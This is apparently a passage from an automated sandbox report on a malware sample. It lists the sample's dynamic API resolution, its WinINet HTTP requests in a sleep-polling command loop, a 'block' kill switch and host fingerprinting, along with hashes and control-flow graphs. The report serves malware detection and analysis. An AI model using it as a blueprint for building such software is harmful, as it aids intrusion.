                                    • GetProcAddress.KERNEL32(74DD0000,008CD048), ref: 00FB9FFA
                                    • GetProcAddress.KERNEL32(74DD0000,008B53F0), ref: 00FBA013
                                    • GetProcAddress.KERNEL32(74DD0000,008B5850), ref: 00FBA02B
                                    • LoadLibraryA.KERNEL32(008CCFB8,?,00FB5CA3,00FC0AEB,?,?,?,?,?,?,?,?,?,?,00FC0AEA,00FC0AE3), ref: 00FBA03D
                                    • LoadLibraryA.KERNEL32(008CCE50,?,00FB5CA3,00FC0AEB,?,?,?,?,?,?,?,?,?,?,00FC0AEA,00FC0AE3), ref: 00FBA04E
                                    • LoadLibraryA.KERNEL32(008CCDD8,?,00FB5CA3,00FC0AEB,?,?,?,?,?,?,?,?,?,?,00FC0AEA,00FC0AE3), ref: 00FBA060
                                    • LoadLibraryA.KERNEL32(008CCEE0,?,00FB5CA3,00FC0AEB,?,?,?,?,?,?,?,?,?,?,00FC0AEA,00FC0AE3), ref: 00FBA072
                                    • LoadLibraryA.KERNEL32(008CCE68,?,00FB5CA3,00FC0AEB,?,?,?,?,?,?,?,?,?,?,00FC0AEA,00FC0AE3), ref: 00FBA083
                                    • LoadLibraryA.KERNEL32(008CCFD0,?,00FB5CA3,00FC0AEB,?,?,?,?,?,?,?,?,?,?,00FC0AEA,00FC0AE3), ref: 00FBA095
                                    • LoadLibraryA.KERNEL32(008CCFE8,?,00FB5CA3,00FC0AEB,?,?,?,?,?,?,?,?,?,?,00FC0AEA,00FC0AE3), ref: 00FBA0A7
                                    • LoadLibraryA.KERNEL32(008CD060,?,00FB5CA3,00FC0AEB,?,?,?,?,?,?,?,?,?,?,00FC0AEA,00FC0AE3), ref: 00FBA0B8
                                    • GetProcAddress.KERNEL32(75290000,008B5770), ref: 00FBA0DA
                                    • GetProcAddress.KERNEL32(75290000,008CD210), ref: 00FBA0F2
                                    • GetProcAddress.KERNEL32(75290000,008C90D0), ref: 00FBA10A
                                    • GetProcAddress.KERNEL32(75290000,008CD1B0), ref: 00FBA123
                                    • GetProcAddress.KERNEL32(75290000,008B5810), ref: 00FBA13B
                                    • GetProcAddress.KERNEL32(73440000,008BB8E0), ref: 00FBA160
                                    • GetProcAddress.KERNEL32(73440000,008B5890), ref: 00FBA179
                                    • GetProcAddress.KERNEL32(73440000,008BB750), ref: 00FBA191
                                    • GetProcAddress.KERNEL32(73440000,008CD0F0), ref: 00FBA1A9
                                    • GetProcAddress.KERNEL32(73440000,008CD3C0), ref: 00FBA1C2
                                    • GetProcAddress.KERNEL32(73440000,008B5650), ref: 00FBA1DA
                                    • GetProcAddress.KERNEL32(73440000,008B59B0), ref: 00FBA1F2
                                    • GetProcAddress.KERNEL32(73440000,008CD2D0), ref: 00FBA20B
                                    • GetProcAddress.KERNEL32(752C0000,008B5610), ref: 00FBA22C
                                    • GetProcAddress.KERNEL32(752C0000,008B5930), ref: 00FBA244
                                    • GetProcAddress.KERNEL32(752C0000,008CD390), ref: 00FBA25D
                                    • GetProcAddress.KERNEL32(752C0000,008CD0D8), ref: 00FBA275
                                    • GetProcAddress.KERNEL32(752C0000,008B58F0), ref: 00FBA28D
                                    • GetProcAddress.KERNEL32(74EC0000,008BBB60), ref: 00FBA2B3
                                    • GetProcAddress.KERNEL32(74EC0000,008BBB88), ref: 00FBA2CB
                                    • GetProcAddress.KERNEL32(74EC0000,008CD1C8), ref: 00FBA2E3
                                    • GetProcAddress.KERNEL32(74EC0000,008B5790), ref: 00FBA2FC
                                    • GetProcAddress.KERNEL32(74EC0000,008B5870), ref: 00FBA314
                                    • GetProcAddress.KERNEL32(74EC0000,008BB908), ref: 00FBA32C
                                    • GetProcAddress.KERNEL32(75BD0000,008CD2E8), ref: 00FBA352
                                    • GetProcAddress.KERNEL32(75BD0000,008B5670), ref: 00FBA36A
                                    • GetProcAddress.KERNEL32(75BD0000,008C9150), ref: 00FBA382
                                    • GetProcAddress.KERNEL32(75BD0000,008CD300), ref: 00FBA39B
                                    • GetProcAddress.KERNEL32(75BD0000,008CD198), ref: 00FBA3B3
                                    • GetProcAddress.KERNEL32(75BD0000,008B56D0), ref: 00FBA3CB
                                    • GetProcAddress.KERNEL32(75BD0000,008B5690), ref: 00FBA3E4
                                    • GetProcAddress.KERNEL32(75BD0000,008CD318), ref: 00FBA3FC
                                    • GetProcAddress.KERNEL32(75BD0000,008CD1E0), ref: 00FBA414
                                    • GetProcAddress.KERNEL32(75A70000,008B5910), ref: 00FBA436
                                    • GetProcAddress.KERNEL32(75A70000,008CD3A8), ref: 00FBA44E
                                    • GetProcAddress.KERNEL32(75A70000,008CD258), ref: 00FBA466
                                    • GetProcAddress.KERNEL32(75A70000,008CD330), ref: 00FBA47F
                                    • GetProcAddress.KERNEL32(75A70000,008CD240), ref: 00FBA497
                                    • GetProcAddress.KERNEL32(75450000,008B58B0), ref: 00FBA4B8
                                    • GetProcAddress.KERNEL32(75450000,008B56B0), ref: 00FBA4D1
                                    • GetProcAddress.KERNEL32(75DA0000,008B57B0), ref: 00FBA4F2
                                    • GetProcAddress.KERNEL32(75DA0000,008CD108), ref: 00FBA50A
                                    • GetProcAddress.KERNEL32(6F070000,008B56F0), ref: 00FBA530
                                    • GetProcAddress.KERNEL32(6F070000,008B57F0), ref: 00FBA548
                                    • GetProcAddress.KERNEL32(6F070000,008B58D0), ref: 00FBA560
                                    • GetProcAddress.KERNEL32(6F070000,008CD228), ref: 00FBA579
                                    • GetProcAddress.KERNEL32(6F070000,008B5630), ref: 00FBA591
                                    • GetProcAddress.KERNEL32(6F070000,008B57D0), ref: 00FBA5A9
                                    • GetProcAddress.KERNEL32(6F070000,008B5970), ref: 00FBA5C2
                                    • GetProcAddress.KERNEL32(6F070000,008B5950), ref: 00FBA5DA
                                    • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00FBA5F1
                                    • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00FBA607
                                    • GetProcAddress.KERNEL32(75AF0000,008CD2A0), ref: 00FBA629
                                    • GetProcAddress.KERNEL32(75AF0000,008C9130), ref: 00FBA641
                                    • GetProcAddress.KERNEL32(75AF0000,008CD1F8), ref: 00FBA659
                                    • GetProcAddress.KERNEL32(75AF0000,008CD348), ref: 00FBA672
                                    • GetProcAddress.KERNEL32(75D90000,008B5710), ref: 00FBA693
                                    • GetProcAddress.KERNEL32(6CF70000,008CD360), ref: 00FBA6B4
                                    • GetProcAddress.KERNEL32(6CF70000,008B5990), ref: 00FBA6CD
                                    • GetProcAddress.KERNEL32(6CF70000,008CD270), ref: 00FBA6E5
                                    • GetProcAddress.KERNEL32(6CF70000,008CD378), ref: 00FBA6FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: 83e9e1355c5d12eaa079b6ee4e6339988b97d2ae7ff533b9ba8c2438a0b737e1
                                    • Instruction ID: b1cb67a2d188850e60ab5adc62b4382a7c8b144ce23648852ecedb0dd1f06738
                                    • Opcode Fuzzy Hash: 83e9e1355c5d12eaa079b6ee4e6339988b97d2ae7ff533b9ba8c2438a0b737e1
                                    • Instruction Fuzzy Hash: 5D620BB5940640AFC36CDBE8F5989563BF9EF8C701315853AB6268B24CD63A98C1DF50
                                    Function 00FA6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1033 fa6280-fa630b call fba7a0 call fa47b0 call fba740 InternetOpenA StrCmpCA 1040 fa630d 1033->1040 1041 fa6314-fa6318 1033->1041 1040->1041 1042 fa6509-fa6525 call fba7a0 call fba800 * 2 1041->1042 1043 fa631e-fa6342 InternetConnectA 1041->1043 1061 fa6528-fa652d 1042->1061 1044 fa6348-fa634c 1043->1044 1045 fa64ff-fa6503 InternetCloseHandle 1043->1045 1048 fa635a 1044->1048 1049 fa634e-fa6358 1044->1049 1045->1042 1051 fa6364-fa6392 HttpOpenRequestA 1048->1051 1049->1051 1053 fa6398-fa639c 1051->1053 1054 fa64f5-fa64f9 InternetCloseHandle 1051->1054 1056 fa639e-fa63bf InternetSetOptionA 1053->1056 1057 fa63c5-fa6405 HttpSendRequestA HttpQueryInfoA 1053->1057 1054->1045 1056->1057 1059 fa642c-fa644b call fb8940 1057->1059 1060 fa6407-fa6427 call fba740 call fba800 * 2 1057->1060 1067 fa64c9-fa64e9 call fba740 call fba800 * 2 1059->1067 1068 fa644d-fa6454 1059->1068 1060->1061 1067->1061 1071 fa6456-fa6480 InternetReadFile 1068->1071 1072 fa64c7-fa64ef InternetCloseHandle 1068->1072 1076 fa648b 1071->1076 1077 fa6482-fa6489 1071->1077 1072->1054 1076->1072 1077->1076 1080 fa648d-fa64c5 call fba9b0 call fba8a0 call fba800 1077->1080 1080->1071
                                    APIs
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FA4839
                                      • Part of subcall function 00FA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FA4849
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    • InternetOpenA.WININET(00FC0DFE,00000001,00000000,00000000,00000000), ref: 00FA62E1
                                    • StrCmpCA.SHLWAPI(?,008CEB98), ref: 00FA6303
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FA6335
                                    • HttpOpenRequestA.WININET(00000000,GET,?,008CE268,00000000,00000000,00400100,00000000), ref: 00FA6385
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FA63BF
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FA63D1
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00FA63FD
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FA646D
                                    • InternetCloseHandle.WININET(00000000), ref: 00FA64EF
                                    • InternetCloseHandle.WININET(00000000), ref: 00FA64F9
                                    • InternetCloseHandle.WININET(00000000), ref: 00FA6503
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: 6f4e482215496a77cd326761de7a486976e7a1127a1e444f0afcafb9c636625a
                                    • Instruction ID: c1bb5a51e47107c328cd5708ac8d2e14dc0a8ea3f85dc46f627c21fc9a8df62b
                                    • Opcode Fuzzy Hash: 6f4e482215496a77cd326761de7a486976e7a1127a1e444f0afcafb9c636625a
                                    • Instruction Fuzzy Hash: D1715EB1A00218ABDB24DBE0DC55FEE77B8BF49700F108158F50AAB1C4DBB4AA85DF51
                                    Function 00FB5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1090 fb5510-fb5577 call fb5ad0 call fba820 * 3 call fba740 * 4 1106 fb557c-fb5583 1090->1106 1107 fb55d7-fb564c call fba740 * 2 call fa1590 call fb52c0 call fba8a0 call fba800 call fbaad0 StrCmpCA 1106->1107 1108 fb5585-fb55b6 call fba820 call fba7a0 call fa1590 call fb51f0 1106->1108 1134 fb5693-fb56a9 call fbaad0 StrCmpCA 1107->1134 1138 fb564e-fb568e call fba7a0 call fa1590 call fb51f0 call fba8a0 call fba800 1107->1138 1124 fb55bb-fb55d2 call fba8a0 call fba800 1108->1124 1124->1134 1139 fb56af-fb56b6 1134->1139 1140 fb57dc-fb5844 call fba8a0 call fba820 * 2 call fa1670 call fba800 * 4 call fb6560 call fa1550 1134->1140 1138->1134 1143 fb57da-fb585f call fbaad0 StrCmpCA 1139->1143 1144 fb56bc-fb56c3 1139->1144 1270 fb5ac3-fb5ac6 1140->1270 1163 fb5991-fb59f9 call fba8a0 call fba820 * 2 call fa1670 call fba800 * 4 call fb6560 call fa1550 1143->1163 1164 fb5865-fb586c 1143->1164 1148 fb571e-fb5793 call fba740 * 2 call fa1590 call fb52c0 call fba8a0 call fba800 call fbaad0 StrCmpCA 1144->1148 1149 fb56c5-fb5719 call fba820 call fba7a0 call fa1590 call fb51f0 call fba8a0 call fba800 1144->1149 1148->1143 1249 fb5795-fb57d5 call fba7a0 call fa1590 call fb51f0 call fba8a0 call fba800 1148->1249 1149->1143 1163->1270 1170 fb598f-fb5a14 call fbaad0 StrCmpCA 1164->1170 1171 fb5872-fb5879 1164->1171 1200 fb5a28-fb5a91 call fba8a0 call fba820 * 2 call fa1670 call fba800 * 4 call fb6560 call fa1550 1170->1200 1201 fb5a16-fb5a21 Sleep 1170->1201 1179 fb587b-fb58ce call fba820 call fba7a0 call fa1590 call fb51f0 call fba8a0 call fba800 1171->1179 1180 fb58d3-fb5948 call fba740 * 2 call fa1590 call fb52c0 call fba8a0 call fba800 call fbaad0 StrCmpCA 1171->1180 1179->1170 1180->1170 1275 fb594a-fb598a call fba7a0 call fa1590 call fb51f0 call fba8a0 call fba800 1180->1275 1200->1270 1201->1106 1249->1143 1275->1170
                                    APIs
                                      • Part of subcall function 00FBA820: lstrlen.KERNEL32(00FA4F05,?,?,00FA4F05,00FC0DDE), ref: 00FBA82B
                                      • Part of subcall function 00FBA820: lstrcpy.KERNEL32(00FC0DDE,00000000), ref: 00FBA885
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FB5644
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FB56A1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FB5857
                                      • Part of subcall function 00FBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FBA7E6
                                      • Part of subcall function 00FB51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FB5228
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                      • Part of subcall function 00FB52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FB5318
                                      • Part of subcall function 00FB52C0: lstrlen.KERNEL32(00000000), ref: 00FB532F
                                      • Part of subcall function 00FB52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00FB5364
                                      • Part of subcall function 00FB52C0: lstrlen.KERNEL32(00000000), ref: 00FB5383
                                      • Part of subcall function 00FB52C0: lstrlen.KERNEL32(00000000), ref: 00FB53AE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FB578B
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00FB5940
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00FB5A0C
                                    • Sleep.KERNEL32(0000EA60), ref: 00FB5A1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: 4b669c42be69c2a85937136ec4ade365adbd728ef0c43034ff6542d60f67f99a
                                    • Instruction ID: ee733f9323c8b489bdcd31aa18a2a8adca5078bae733cdc44e089858b5d8953f
                                    • Opcode Fuzzy Hash: 4b669c42be69c2a85937136ec4ade365adbd728ef0c43034ff6542d60f67f99a
                                    • Instruction Fuzzy Hash: C1E14371910108AACB18FBE1EC53EED737CAF54700F508128B41667495EF3CAA59EFA2
                                    Function 00FB17A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1301 fb17a0-fb17cd call fbaad0 StrCmpCA 1304 fb17cf-fb17d1 ExitProcess 1301->1304 1305 fb17d7-fb17f1 call fbaad0 1301->1305 1309 fb17f4-fb17f8 1305->1309 1310 fb17fe-fb1811 1309->1310 1311 fb19c2-fb19cd call fba800 1309->1311 1312 fb199e-fb19bd 1310->1312 1313 fb1817-fb181a 1310->1313 1312->1309 1315 fb187f-fb1890 StrCmpCA 1313->1315 1316 fb185d-fb186e StrCmpCA 1313->1316 1317 fb1913-fb1924 StrCmpCA 1313->1317 1318 fb1932-fb1943 StrCmpCA 1313->1318 1319 fb18f1-fb1902 StrCmpCA 1313->1319 1320 fb1951-fb1962 StrCmpCA 1313->1320 1321 fb1970-fb1981 StrCmpCA 1313->1321 1322 fb1835-fb1844 call fba820 1313->1322 1323 fb1849-fb1858 call fba820 1313->1323 1324 fb18cf-fb18e0 StrCmpCA 1313->1324 1325 fb198f-fb1999 call fba820 1313->1325 1326 fb18ad-fb18be StrCmpCA 1313->1326 1327 fb1821-fb1830 call fba820 1313->1327 1350 fb189e-fb18a1 1315->1350 1351 fb1892-fb189c 1315->1351 1348 fb187a 1316->1348 1349 fb1870-fb1873 1316->1349 1335 fb1930 1317->1335 1336 fb1926-fb1929 1317->1336 1337 fb194f 1318->1337 1338 fb1945-fb1948 1318->1338 1333 fb190e 1319->1333 1334 fb1904-fb1907 1319->1334 1339 fb196e 1320->1339 1340 fb1964-fb1967 1320->1340 1342 fb198d 1321->1342 1343 fb1983-fb1986 1321->1343 1322->1312 1323->1312 1331 fb18ec 1324->1331 1332 fb18e2-fb18e5 1324->1332 1325->1312 1329 fb18ca 1326->1329 1330 fb18c0-fb18c3 1326->1330 1327->1312 1329->1312 1330->1329 1331->1312 1332->1331 1333->1312 1334->1333 1335->1312 1336->1335 1337->1312 1338->1337 1339->1312 1340->1339 1342->1312 1343->1342 1348->1312 1349->1348 1352 fb18a8 1350->1352 1351->1352 1352->1312
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 00FB17C5
                                    • ExitProcess.KERNEL32 ref: 00FB17D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 660ae4e6e0c42f88e30e9481a708f5b90416ab6eeda65314180cd8134c911723
                                    • Instruction ID: d9860758793c0e80adfd6d45e8ed8d85bf073558e6888b319c38bb420e3e1823
                                    • Opcode Fuzzy Hash: 660ae4e6e0c42f88e30e9481a708f5b90416ab6eeda65314180cd8134c911723
                                    • Instruction Fuzzy Hash: AD5148B5A00209EBCB04DFE2D965BFE77B5BF44704F508068E416AB240DB74E952EF62
                                    Function 00FB7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1356 fb7500-fb754a GetWindowsDirectoryA 1357 fb754c 1356->1357 1358 fb7553-fb75c7 GetVolumeInformationA call fb8d00 * 3 1356->1358 1357->1358 1365 fb75d8-fb75df 1358->1365 1366 fb75fc-fb7617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 fb75e1-fb75fa call fb8d00 1365->1367 1369 fb7619-fb7626 call fba740 1366->1369 1370 fb7628-fb7658 wsprintfA call fba740 1366->1370 1367->1365 1377 fb767e-fb768e 1369->1377 1370->1377
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00FB7542
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FB757F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FB7603
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FB760A
                                    • wsprintfA.USER32 ref: 00FB7640
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
                                    • API String ID: 1544550907-3809124531
                                    • Opcode ID: 938f50621c67ce8259f389c7e926734db92c761cc9b230789843d13353917a2d
                                    • Instruction ID: 9f2343de5604f4ffc47ba3d9ffdfe944dc8bfc5150e3d47d1c547e0a5d990963
                                    • Opcode Fuzzy Hash: 938f50621c67ce8259f389c7e926734db92c761cc9b230789843d13353917a2d
                                    • Instruction Fuzzy Hash: 114181B1D04348ABDB24DF95DC55BDEBBB8AF48700F100099F5096B280DB78AA84DFA5
                                    Function 00FB69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
